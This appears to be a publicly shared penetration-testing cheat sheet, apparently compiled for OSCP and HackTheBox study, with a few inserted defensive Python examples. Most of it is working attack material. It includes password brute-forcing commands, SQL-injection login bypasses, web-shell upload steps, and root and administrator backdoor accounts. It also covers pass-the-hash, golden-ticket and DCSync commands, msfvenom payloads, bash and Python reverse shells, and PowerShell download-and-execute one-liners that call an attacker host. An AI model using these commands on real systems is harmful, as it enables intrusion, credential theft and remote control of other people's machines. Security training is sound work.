The tools, techniques and procedures described on this page should only be used for approved penetration testing, CTFs and other legal hacking challenge websites. Any actions or activities related to the material contained within this site are solely the user's responsibility and not that of the website owner. The author of this website will not be held responsible in the event that any criminal charges are brought against individuals who misuse the information contained within to break the law.
This website was originally created as a place to store notes related to penetration testing while working on HTB challenges and studying for the Offensive Security Certified Professional (OSCP) exam. I am now making this content publicly available as my thank you to the offsec community in the hope that it will be of some help to others on their infosec journey. A point to note is that I do not claim any ownership of the content below; instead, this is more of a curated list of useful commands, tools and resources I have used.
Finally, this is a work-in-progress site; comments on changes/additions are welcome.
- Default scripts, enumerate versions, output in all formats.
nmap -sC -sV -oA nmap <IP>
- Scan the top 20 UDP ports (SNMP, TFTP etc.).
nmap -sU --top-ports 20 <IP>
- Scan all ports
nmap -p- <IP>
- Vulnerability scanning
nmap --script vuln <IP>
nmap -v -p 139,445 --script=smb-vuln* <IP>
- Quick check whether a port is open: -z connects and disconnects without sending data, -v is verbose.
nc -zv <IP> <PORT>
nbtscan -r <IP>
nbtscan -rvh <IP>
- Usually only very old SSH versions are directly vulnerable; check for weak username/password combinations instead.
hydra -l <USERNAME> -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://<IP>
hydra -l <USERNAME> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
- Validate whether a user exists (SMTP VRFY).
nc 10.x.x.x 25
VRFY root
252 2.0.0 root
VRFY obiwan
550 5.1.1 <obiwan>: Recipient address rejected
- Zone transfer.
dig axfr @<IP> <domain.name>
dnsrecon -d <domain.name>
- Mirror contents of FTP share to local machine via anonymous login.
wget -m --no-passive ftp://anonymous:anonymous@<IP>
- Change to binary mode. Use when uploading exploits so a bit-for-bit transfer is performed.
binary
- rpcbind on port 111 can point to NFS if seen on a Linux host.
- Enumeration
nmap -sV -p 111 --script=rpcinfo $RHOST
nmap -p 111 --script nfs* 10.x.x.x
If a share is found, mount it with: mount -o nolock <IP>:/<fileshare> /path/to/local/folder/to/mount/to
- Create a local group and user with the same GID/UID as the owner of the files on the share, so they can be read.
groupadd --gid 5555 groupname
useradd --uid 5555 -g groupname username
- Brute force web directories to find all valid pages.
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o <output_file>
Use -k for HTTPS.
Use -x to search for file extensions, e.g. .txt, .php, .html.
Use -a to set the user agent string. This is useful when a site blocks directory brute-forcing from tools that do not send a browser user agent, e.g.:
-a 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0'
- Brute force web directories, append a forward slash (-f) and output the page length (-l).
gobuster dir -u <URL> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f -l
- Loop to brute force multiple web directories. Example:
for i in admin dev test backup loop; do gobuster dir -u <URL>/${i} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob; done
nikto -h <IP> -o nikto-out.txt
- Can identify Heartbleed and other TLS/certificate-based vulnerabilities.
sslscan <IP>
- On a PHP website, files whose extension is not .php will not have their PHP code executed. Try changing the extension to .php and see whether the content is displayed correctly.
davtest -url http://<URL>
- Copy exploit script/data to the current directory.
searchsploit -m <exploit number>
- List/browse shares
smbclient -L <IP>
smbmap -H <IP>
smbclient //IP/Path -U <username_if_you_have_one>
- Mount a large file found on an SMB share (VHD etc.)
mount -t cifs -o 'rw,username=guest' //IP/Backups mnt
guestmount --add /mnt/remote/path/to/vhdfile.vhd --inspector --ro /mnt/vhd -v
- Detect targets vulnerable to relay using CrackMapExec. Outputs a list of hosts with SMB signing disabled.
crackmapexec smb <CIDR> --gen-relay-list targets.txt
- Verify the UDP port is indeed open by running a script scan on it.
nmap -sU -sV -sC --open -p <Port> <IP>
- Extract SNMP info
snmp-check <IP>
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP>
snmpwalk -v1 -c public <IP>
- Location
/etc/hosts
- nslookup: point it at the victim's DNS server, then look up the victim IP to see what it resolves to; this may reveal additional domain names.
nslookup
server <victim machine IP running DNS>
<IP>
- WordPress enumeration
wpscan --url <IP> -e vt,tt,u,ap --log wpscan.log
Log into /wp-admin
Locate plugin-shell.php (from SecLists)
Zip the plugin: sudo zip plugin-shell.zip plugin-shell.php
Upload via Plugins > Add New > Install Now
Use curl to issue commands:
curl http://<website>/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami
- Crawl a site and create a wordlist
cewl <URL> -w Results.txt
- SecLists location
/usr/share/seclists
- rockyou location
/usr/share/wordlists/rockyou.txt
ldapsearch -x -b "dc=<domainname>,dc=domain" "*" -h <ip>
ldapsearch -x -b "dc=SOME-DOMAIN,dc=LOCAL" "*" -h 10.10.10.X
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<FQDN>'" <IP>
- Checking for directory traversal: file extensions in parameters are a typical indicator, e.g. content.php?file=product1.php
- On a Windows host, try to include the hosts file:
http://<IP>/menu.php?file=/../../../../../../windows/system32/drivers/etc/hosts
- Check all .db, .xml etc. files found via gobuster/dirbuster searches for strings that could be usernames/passwords.
- Try multiple variations on what's found: pass19, pass20, f.lastname, f_lastname, first_l etc.
- Look up and try default usernames and passwords.
- Get the victim machine to authenticate back to the attacking machine via SQLi (xp_dirtree) or other means and use Responder to capture the hash.
responder -I <interface>
- Scrape a webpage and create a wordlist containing words of minimum length 6 characters
cewl www.website.com -m 6 -w output-file.txt
- Use john to mutate a wordlist to create more entries (the custom rule must be added to /etc/john/john.conf first).
john --wordlist=<wordlist-name> --rules --stdout > mutated-wordlist.txt
- Use Crunch to create a wordlist.
- min length = 4, max length = 6, -t = rule pattern, -f = charset file.
- Pre-defined character sets: /usr/share/crunch/charset.list
crunch 4 6 0123456789ABCDEF -o output.txt
crunch 4 6 -f /usr/share/crunch/charset.list mixalpha -o output.txt
- Brute force an .htaccess-protected page
medusa -h <IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
- RDP brute force.
crowbar -b rdp -s <IP>/32 -u admin -C /usr/share/wordlists/rockyou.txt -n 1
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
- View the page source to get the correct form field names for user/pass etc.
hydra <IP> http-post-form "/form/loginpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
sqlmap -r <login post message captured in Burp>
In the username field: admin'-- -
- Bypass login
User: Admin
Password: OR '1'='1
- Login bypass combinations
' or 1=1 -- -
'or 1 or'
- Union brute force: http://example.com/item.php?id=1
- Try different iterations until the correct column count is discovered
?id=1 union select 1
?id=1 union select 1,2
?id=1 union select 1,2,3
?id=1 union select 1,2,3,4
- Experiment with different DB functions in different column positions
?id=1 union select 1,database(),3,4
?id=1 union select 1,version(),3,4
?id=1 union select 1,password,3,4 from users
john --wordlist=/usr/share/wordlists/rockyou.txt <file.hash>
john --wordlist=/usr/share/wordlists/rockyou.txt asreproast_hashes.txt
Note: the etype 23 may need to be inserted after $krb5asrep$, e.g. $krb5asrep$23$svc-mssql@domain:, if it is not already there.
./ssh2john <id_rsa> >> <outputfile.txt>
- Brute force a login page when only the username is known. ^USER^ and ^PASS^ are Hydra placeholders. Capture the POST request string using Burp.
hydra -l <USERNAME> -P rockyou-50.txt <IP> http-post-form "<Path_To_Login_page>:username=^USER^&password=^PASS^:<Whatever the error msg is for wrong creds>"
- Use cewl to generate a custom wordlist before using the larger rockyou.txt
hydra -l root@localhost -P cewl-list.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-60&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly."
- Brute force a login page that only requires a password. "/" indicates the login page is at the root and not in a sub-directory.
- Since no username is required I just gave it "admin".
hydra -l admin -P rockyou.txt <IP or URL or docker> http-post-form "/:password=^PASS^:Invalid password!" -s <Port>
- Fuzz login credentials when part of the password is known. -d specifies the POST data.
wfuzz -u http://<IP>/login/index.php -d 'anchor=&username=user&password=passwordFUZZ' -w /usr/share/seclists/Fuzzing/special-chars.txt
- Fuzz form-encoded data containing a username and password.
wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php
- Decode a base64 file from the terminal
base64 -d <file_name.txt>
- Decode a base16 (hex) file and output it to a new file
cat index.php | xxd -r -p > filename.txt
- NTLM hashes are stored in the Security Account Manager (SAM) database and in the Domain Controller's NTDS.dit database.
- The first part is the LM hash and the second part is the NT hash. From Vista/Server 2008 onwards only the NT hash is stored.
- Can be obtained with mimikatz or by dumping the SAM/NTDS.dit database.
- CAN PERFORM PASS THE HASH
aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
- Net-NTLM hashes are used for network authentication. They use a challenge/response method and are based on the user's NT hash.
- Can be obtained with Responder and similar tools.
- CANNOT PERFORM PASS THE HASH
- CAN BE USED IN A RELAY ATTACK AGAINST TARGETS WITH SMB SIGNING DISABLED, e.g. ntlmrelayx.py
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
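As an added illustration (not part of the original notes), the following Python classifies a captured string as one of the formats above so an analyst knows what the exposure means. The sample values are constructed, the Net-NTLMv1 layout is included as a generalisation beyond the notes, and the "action" strings are this example's own defensive suggestions.

```python
import re

# Constructed sample values (not real credentials) in the two formats discussed above.
# NTLM as dumped from SAM/NTDS: <LM hash>:<NT hash>, 32 hex chars each.
SAMPLE_NTLM = "aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42"
# Net-NTLMv2 as Responder writes it: user::domain:server_challenge:NTProofStr:blob
SAMPLE_NET_NTLMV2 = (
    "admin::CORP:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:"
    "0101000000000000c0653150de09d201"
)

# An LM field holding this constant means "no LM hash stored" (Vista/2008 and later).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

NTLM_RE = re.compile(r"^([0-9a-f]{32}):([0-9a-f]{32})$", re.I)
# Net-NTLMv1: user::domain:LM_response(48 hex):NT_response(48 hex):challenge(16 hex)
NET_NTLMV1_RE = re.compile(
    r"^([^:]+)::([^:]*):([0-9a-f]{48}):([0-9a-f]{48}):([0-9a-f]{16})$", re.I)
NET_NTLMV2_RE = re.compile(
    r"^([^:]+)::([^:]*):([0-9a-f]{16}):([0-9a-f]{32}):([0-9a-f]+)$", re.I)


def classify(material):
    """Identify which NTLM-family artefact a string is and what exposure it represents.

    Following the notes above: an NTLM hash is directly reusable (pass-the-hash), while a
    Net-NTLM challenge/response is only useful for offline cracking or relaying.
    """
    m = NTLM_RE.match(material)
    if m:
        lm, nt = m.group(1).lower(), m.group(2).lower()
        return {
            "type": "NTLM",
            "lm_present": lm != EMPTY_LM,       # legacy LM hash stored alongside NT
            "nt": nt,
            "reusable_without_cracking": True,  # pass-the-hash: treat like the password
            "action": "reset the account password; the hash is equivalent to the password",
        }
    m = NET_NTLMV1_RE.match(material)
    if m:
        return {
            "type": "Net-NTLMv1",
            "user": m.group(1), "domain": m.group(2),
            "reusable_without_cracking": False,
            "action": "disable NTLMv1 (LmCompatibilityLevel) and enforce SMB signing",
        }
    m = NET_NTLMV2_RE.match(material)
    if m:
        return {
            "type": "Net-NTLMv2",
            "user": m.group(1), "domain": m.group(2),
            "server_challenge": m.group(3).lower(),
            "reusable_without_cracking": False,  # can be relayed or cracked, not passed
            "action": "enforce SMB signing and check which spoofed name the client resolved",
        }
    return {"type": "unknown"}
```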
- Dump the SAM and SYSTEM hives and extract the hashes offline:
reg save hklm\sam c:\sam
reg save hklm\system c:\system
samdump2 system sam
- Useful if you have obtained a list of potential domain users (AS-REP roasting).
python GetNPUsers.py <FQDN>/ -usersfile top-usernames-shortlist.txt -format hashcat -outputfile hashes.asreproast
python GetNPUsers.py domain.name/ -usersfile ListOfUsers.txt -format john -outputfile <Outfile> -dc-ip <IP>
python secretsdump.py <FQDN>/<USER>@<IP>
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@<IP>
- Docker privilege escalation: if the user can run docker, mount the host's /etc into a container.
https://www.hackingarticles.in/docker-privilege-escalation/
docker run -v /etc:/mnt -it alpine
- Compile a C exploit (use -m32 for a 32-bit target):
gcc -march=x86-64 <exploit.c> -o <compiled-exploit-name>
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
- If you have write access to /etc/passwd, a new user with root privileges can be added.
- To create the new user, openssl can be used to hash the password with a salt.
openssl passwd -1 -salt <username> <password>
sample output: $1$obiwan$eOmyK1CrqORI.Kp/0.64H0
- Edit the /etc/passwd file to include the following:
<username>:$1$obiwan$eOmyK1CrqORI.Kp/0.64H0:0:0:root:/root:/bin/bash
openssl passwd Passw0rd1
echo "NewRootUser:<Output of openssl above>:0:0:root:/root:/bin/bash" >> /etc/passwd
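Added example, not from the original notes: a small audit of /etc/passwd that flags exactly the pattern described above (an extra UID 0 entry, or a hash stored in the password field instead of "x" so /etc/shadow is bypassed), run here over a constructed sample file. The first hash in the sample is the openssl output shown above; the second is made up.

```python
# Constructed /etc/passwd sample: normal entries plus the two kinds of added-root lines.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
obiwan:$1$obiwan$eOmyK1CrqORI.Kp/0.64H0:0:0:root:/root:/bin/bash
NewRootUser:$6$constructd$CONSTRUCTEDHASHVALUE:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

# Values in the password field that mean "look in /etc/shadow" or "login disabled".
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    """Parse passwd-format text into dicts; malformed lines are reported, not skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "name": "<line %d>" % lineno, "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "line": lineno, "name": name, "password": pw,
            "uid": int(uid) if uid.isdigit() else None, "gid": gid,
            "home": home, "shell": shell, "malformed": False,
        })
    return entries


def audit_passwd(text):
    """Return (user, finding) pairs for entries a defender should investigate."""
    findings = []
    seen_uids = {}   # uid -> first account seen with it
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["name"], "malformed line"))
            continue
        # Any UID 0 account other than root is a second root login.
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
        # A real hash here means the account authenticates without /etc/shadow.
        if e["password"] not in SHADOW_MARKERS and not e["password"].startswith("!"):
            findings.append((e["name"], "password hash stored in /etc/passwd"))
            if e["password"].startswith("$1$"):   # what "openssl passwd -1" produces
                findings.append((e["name"], "MD5-crypt hash (openssl passwd -1): weak"))
        if e["uid"] is not None and e["uid"] in seen_uids:
            findings.append((e["name"], "duplicate UID with " + seen_uids[e["uid"]]))
        seen_uids.setdefault(e["uid"], e["name"])
    return findings
```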
adduser <username>
usermod -aG sudo <username>
- Copy a file to a host over SSH using a private key:
scp -i </path/to/id_rsa> <FiletoCopy.txt> user@x.x.x.x:/path/to/copy/file/to/filename.txt
- .ssh/authorized_keys (server): contains the public keys of any authorised clients who can connect.
- .ssh/id_rsa (client): contains the private key for the client that wishes to connect to the server.
- .ssh/id_rsa.pub (client): contains the public key for the client.
ssh -i mykey user@<IP>
# list allowed commands for invoking user
sudo -l
# run commands as another user
sudo -u <username>
# run a bash shell as another user
sudo -u <username> bash
Run systeminfo on the victim machine and save the output to systeminfo.txt, then:
python windows-exploit-suggester.py -d <latest security bulletin .xls> -i <systeminfo.txt>
windows-privesc-check2.exe --dump -G
# load modules
. .\SharpHound.ps1
Invoke-BloodHound -Domain <FQDN> -LDAPUser <USER> -LDAPPass <PASS> -CollectionMethod All -DomainController <HOSTNAME> -ZipFileName Hound3.zip
neo4j console
bloodhound
# Creating PSCredential object for use with Powerview
$pass = convertto-securestring 'Password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\anakin', $pass)
# DCSync using PowerView.ps1. Note: the commands given in BloodHound may not be correct; if they do not work, look them up on gitbook.io
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Dc=htb,Dc=local" -PrincipalIdentity anakin -Rights DCSync
powershell -ep bypass
. .\PowerUp.ps1
- Copy PowerView.ps1 onto target box for enumeration of AD environment
get-netdomain
get-netdomaincontroller
get-netuser | select cn, logoncount
get-netgroup
get-netgroup -GroupName <name>, e.g. *admin*
get-netgroupmember -Groupname <"name">
Invoke-ShareFinder
get-netgpo
get-netgpo | select displayname, whenchanged
sekurlsa::tickets /export
Run from /usr/share/kerberoast (so the .py script can load the correct modules)
python tgsrepcrack.py <wordlist> <SPN.kirbi>
python kirbi2john.py dumpedTicket.kirbi > john-kirbi.txt
john john-kirbi.txt --wordlist=wordlist.txt
ruby evil-winrm.rb -i <IP> -u <user> -p '<password>'
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
- If you have the SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege privileges, the RottenPotatoNG local privilege escalation exploit can be used to get NT AUTHORITY\SYSTEM.
In a meterpreter session run getprivs, e.g.:
getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
In a Windows cmd session:
whoami /priv
https://ohpe.it/juicy-potato/CLSID/
# On the target system, after copying the required binaries
echo C:\temp\nc.exe -e cmd.exe <Attacking IP> <Attacking Port> > rev.bat
.\JuicyPotato.exe -l 1337 -p C:\temp\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
- Method (D***o Writeup)
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
Meterpreter
use incognito
list_tokens -u
https://foxglovesecurity.com/2016/01/16/hot-potato/
net user obiwan Passw0rd1 /add
net localgroup administrators obiwan /add
# adduser.c contents
#include <stdlib.h>
/* Creates a local user and adds it to the local administrators group. */
int main(void)
{
    system("net user obiwan Passw0rd1 /add");
    system("net localgroup administrators obiwan /add");
    return 0;
}
# compile into .exe
i686-w64-mingw32-gcc adduser.c -o adduser.exe
net accounts
mimikatz # sekurlsa::pth /user:<username> /domain:<domain.com> /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:PowerShell.exe
List Kerberos cached tickets (PowerShell). Note: you may need to request a ticket first, e.g. with net use:
net use \\dc01
klist
psexec.exe \\dc01 cmd.exe
mimikatz # lsadump::lsa /patch
Or from kiwi via meterpreter:
creds_msf
whoami /user
or
whoami /all
kerberos::golden /user:obiwan /domain:domain.com /sid:S-1-5-21-4038953314-3014849035-1274281563 /krbtgt:fc274a94b36874d2560a7bd332604fab /ptt
misc::cmd
lsadump::dcsync /user:Administrator
use exploit/windows/local/bypassuac_injection_winsxs
List all files including hidden ones
dir /ah
wmic logicaldisk get name
net use
net use z: \\remotepc\sharename
net use z: /delete
net use \\remotepc\C$ /u:username password
psexec.py <User>:@<IP> -hashes aad3b435b51404eeaad3b435b51404ee:<second part of NTLM hash>
- Copy an exploit-db Metasploit module into the local msf modules directory:
cp /usr/share/exploitdb/exploits/multiple/remote/<EXPLOIT.rb> /root/.msf4/modules/
use exploit/multi/handler
set LHOST <attacker IP>
set LPORT <attacker Port>
set payload windows/meterpreter/reverse_tcp
exploit
- Meterpreter reverse shell in exe format for use on windows machine (.exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attackers_IP> LPORT=<Attackers_Port> -f <file-type e.g. exe> > <name.exe>
- Meterpreter reverse shell in vba format for use in file with macros e.g. .doc
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba -o <NAME.doc>
- msfvenom payload used on an smb exploit for windows xp box
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
- Adobe Coldfusion Java/Jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.jsp
- Tomcat war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f war > shell.war
use post/multi/recon/local_exploit_suggester
set session <session number>
run
use exploit/windows/local/<exploit name>
show options
set session <session number>
set lhost <attacking IP> (may have to enter twice due to a bug)
sessions -i <session number>
hashdump
getsystem
sysinfo
ps
migrate <pid> - may have to migrate to a SYSTEM-owned process for stability or to run things like hashdump
getuid
getprivs
run post/windows/gather/smart_hashdump
run post/windows/gather/credentials/sso
load kiwi - load mimikatz modules
creds_all - within mimikatz
set AutoRunScript post/windows/manage/migrate
crackmapexec smb <CIDR IP RANGE> -u <USER> -H '<HASH>'
- First part of the hash (empty LM): aad3b435b51404eeaad3b435b51404ee
pth-winexe -U <USER>%<FULL:HASH> //<IP> cmd
- Download Sherlock.ps1 from the attacking machine (served via SimpleHTTPServer) onto the victim
(New-Object System.Net.WebClient).DownloadFile("http://<IP>:80/Sherlock.ps1", "C:\Users\user\downloads\Sherlock.ps1")
- Fileless method
powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://<IP>:80/SharpHound.ps1'))"
- Download file from attacking machine and run on victim machine.
powershell "IEX(New-Object Net.WebClient).DownloadString('http://IP:80/<File>')"
- Another method to download and execute; gets around the PowerShell hanging issue
echo IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/PowerUp.ps1') | powershell -noprofile -
- Certutil method (served via SimpleHTTPServer). Note: the quotes can also be omitted.
certutil -urlcache -split -f "http://<IP>:<PORT>/<FILE>" c:\PATH\TO\<FILE>
- nc.exe file transfer
Victim machine: nc.exe -nlvp 4444 > c:\path\to\file\file.exe
Attacking machine: nc -w 3 <Victim IP> 4444 < file.exe
- Remove spaces from a file:
tr -d ' ' < random.txt > random_nospace.txt
- Simple HTTP server to host files on the attacking machine:
python -m SimpleHTTPServer 80
impacket-smbserver <share-name> <path to the share on the attacking machine (run in a specific dir and use ".")>
impacket-smbserver gimme .
impacket-smbserver secure . --smb2support
Execute on the target machine. bash -c runs the command in bash in case you are in another, non-bash shell.
bash -c 'bash -i >& /dev/tcp/ATTACKING IP/PORT 0>&1'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Note: remember that if copying into an existing .py script on the target machine, don't include "python -c ' '". You only need to invoke python -c ' ' from a bash shell.
- Make the shell interactive, tab completion etc.
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg <ENTER> <ENTER>
- Allow clearing of the terminal using clear
export TERM=xterm
- Run a shell through sudo perl:
echo 'exec("/bin/bash");' >> shell.pl
sudo perl shell.pl
- Sometimes a reverse shell may not work even when uploaded successfully and called. In this case a webshell may work, which can then be used to upload a full reverse shell payload and call it via the webshell.
- Tomcat is a web server used to serve web applications developed in Java and built to the Java Servlet specification.
- Apache is open source, free web server software.
- ERROR CODES (HTTP status codes)
- 1xx: Info
- 2xx: Success
- 3xx: Redirect
- 4xx: Client side
- 5xx: Server side
- METHODS
- GET: Read-only method used to retrieve information from a server using a URI.
- POST: General-purpose method to send data to a server, e.g. an image to be uploaded.
- PUT: Replaces the current target resource with the newly uploaded content.
- DELETE: Removes some information contained on the server.
- HEADERS: Extra meta information sent by the client to ensure requests are processed correctly: language, character set, content type, cookies.
- BODY (optional): Core data sent to the server to process the request, i.e. the data the client is sending to the server.
-
- DNS resolves domain names into IP addresses.
- Steps:
- Recursive name server (ISP/public, e.g. Google)
- Root servers: 13, placed strategically around the world. Handle requests for TLDs, e.g. .com, .org etc.
- TLD server: e.g. .com
- Authoritative name server: contains the IPs (records) for the particular domain.
- Clear the DNS cache on Windows:
ipconfig /flushdns
- ssh syntax
ssh username@IPAddress
- Determine Partition Information
mmls image_name.dd
- File system statistics. Indicates type of file system and information about it
fsstat -o offset image_name.dd
- List all the files recursively
fls -r -o offset image_name.dd
- Get file metadata, e.g. MAC times.
istat -o offset image_name.dd identifying number
- Recover the contents of a file and output them to a file named recovered.jpg
icat -o offset image_name.dd identifying number > recovered.jpg
- Extract hidden data from an image (password known)
steghide extract -sf image.jpg -p <password>
- Crack a password-protected zip archive.
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' bank-account.zip
- Use 7zip to list the contents of a zip file and show technical info, e.g. the encryption used.
7z l -slt Access\ target.zip
- Convert a zip file to John the Ripper format
zip2john target.zip
- 1: Static Analysis
- 2: Blackboxing
- 3: Internet Search
- 4: Whiteboxing
- 5: Results
- Source code: human readable, e.g. C code
- Object files: binary code with readable symbols
- Executable: binary code without readable symbols
- Decompiling: usually very difficult, so disassembly is used instead
- Disassembly: transforms the binary executable into readable assembly code
- Load effective address: saves an address and adds values in one instruction.
LEA EAX, [EBX+1]
- Setting a register to zero with XOR is more efficient than using MOV.
XOR EAX, EAX
- MUL multiplies AL, AX or EAX by <src>. The result is stored in AX, DX:AX or EDX:EAX.
MUL <src>
- TEST performs a binary AND on src and dest. It only changes the status flags.
TEST EAX,EBX
- CMP performs a SUB on both operands and sets the appropriate flags.
CMP EBX, EAX
- Scan string (SCAS) compares the value at [EDI] to AL, AX or EAX and sets the appropriate flags (ZF). EDI is incremented/decremented by 1 if DF=0/1.
- REP repeats the instruction using ECX as a counter; after each repetition ECX is decremented.
repne scasb
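Added illustration, not from the original notes: a minimal Python model of the registers and flags the instructions above touch, used to run the classic strlen idiom built from XOR, REPNE SCASB and NOT ECX. It models only ZF and DF, which is all these notes describe.

```python
MASK32 = 0xFFFFFFFF


class MiniX86:
    """Just enough state to show what the instructions above do to registers and flags."""

    def __init__(self, memory=b""):
        self.mem = bytearray(memory)
        self.eax = self.ebx = self.ecx = self.edi = 0
        self.zf = False   # zero flag
        self.df = 0       # direction flag: 0 = EDI increments, 1 = EDI decrements

    # LEA EAX, [EBX+disp]: address arithmetic only, no memory access, no flags changed
    def lea_eax_ebx(self, disp):
        self.eax = (self.ebx + disp) & MASK32

    # XOR EAX, EAX: zeroes EAX and, being an ALU op, sets ZF
    def xor_eax_eax(self):
        self.eax = 0
        self.zf = True

    # TEST a, b: AND without storing the result; only flags change
    def test(self, a, b):
        self.zf = (a & b) == 0

    # CMP a, b: SUB without storing the result; ZF set when the operands are equal
    def cmp(self, a, b):
        self.zf = ((a - b) & MASK32) == 0

    # SCASB: compare the byte at [EDI] with AL, set ZF, then step EDI according to DF
    def scasb(self):
        self.zf = self.mem[self.edi] == (self.eax & 0xFF)
        self.edi = (self.edi + (-1 if self.df else 1)) & MASK32

    # REPNE SCASB: repeat while ECX != 0, decrementing ECX, and stop early once ZF is set
    def repne_scasb(self):
        while self.ecx != 0:
            self.scasb()
            self.ecx = (self.ecx - 1) & MASK32
            if self.zf:
                break


def strlen_repne_scasb(s):
    """The classic strlen idiom: AL=0, ECX=-1, REPNE SCASB, length = NOT ECX - 1."""
    cpu = MiniX86(s + b"\x00")   # NUL-terminated copy of the constructed input
    cpu.xor_eax_eax()            # AL = 0, the byte to search for
    cpu.ecx = MASK32             # ECX = -1, effectively unlimited count
    cpu.edi = 0                  # EDI -> start of the string
    cpu.repne_scasb()
    return ((~cpu.ecx) & MASK32) - 1
```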
- Detection
- Response
- Mitigation
- Reporting
- Recovery
- Remediation
- Lessons learned
- 4688/592: New process executed. Look for obvious .exe's (cscript.exe, sysprep.exe, psexec.exe, oddname.exe).
- 4624/528/540: Account logged in.
- 5140/560: Share was accessed, most likely C$.
- 5156: Windows Firewall network connection by process. Can see the process connect to an external IP.
- 7045/601: New service installed. Normal systems only get new services installed at patch time.
- 4663/567: New file/registry creation. File auditing must be enabled.
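Added example (not from the original notes): the event-ID rules above applied to constructed sample events. The log line format, the field names and the internal-network ranges are assumptions made for the example; the 4663 rule is narrowed to flag access to the SAM/SYSTEM/NTDS.dit files rather than any file creation.

```python
import ipaddress

# Constructed sample events (not from a real system), one per line:
# timestamp,event_id,key=value,key=value,...
SAMPLE_EVENTS = """\
2024-05-01T09:58:02Z,4688,NewProcessName=C:\\Windows\\System32\\svchost.exe,SubjectUserName=SYSTEM
2024-05-01T10:01:15Z,4624,TargetUserName=jsmith,LogonType=3,IpAddress=10.0.0.25
2024-05-01T10:01:16Z,5140,ShareName=\\\\*\\C$,SubjectUserName=jsmith,IpAddress=10.0.0.25
2024-05-01T10:01:20Z,7045,ServiceName=PSEXESVC,ImagePath=%SystemRoot%\\PSEXESVC.exe
2024-05-01T10:01:21Z,4688,NewProcessName=C:\\Windows\\PSEXESVC.exe,SubjectUserName=SYSTEM
2024-05-01T10:02:30Z,4688,NewProcessName=C:\\Windows\\System32\\cscript.exe,SubjectUserName=jsmith
2024-05-01T10:03:05Z,5156,Application=\\device\\harddiskvolume2\\users\\jsmith\\update.exe,DestAddress=203.0.113.77,DestPort=443
2024-05-01T10:03:06Z,5156,Application=\\device\\harddiskvolume2\\windows\\system32\\svchost.exe,DestAddress=10.0.0.5,DestPort=445
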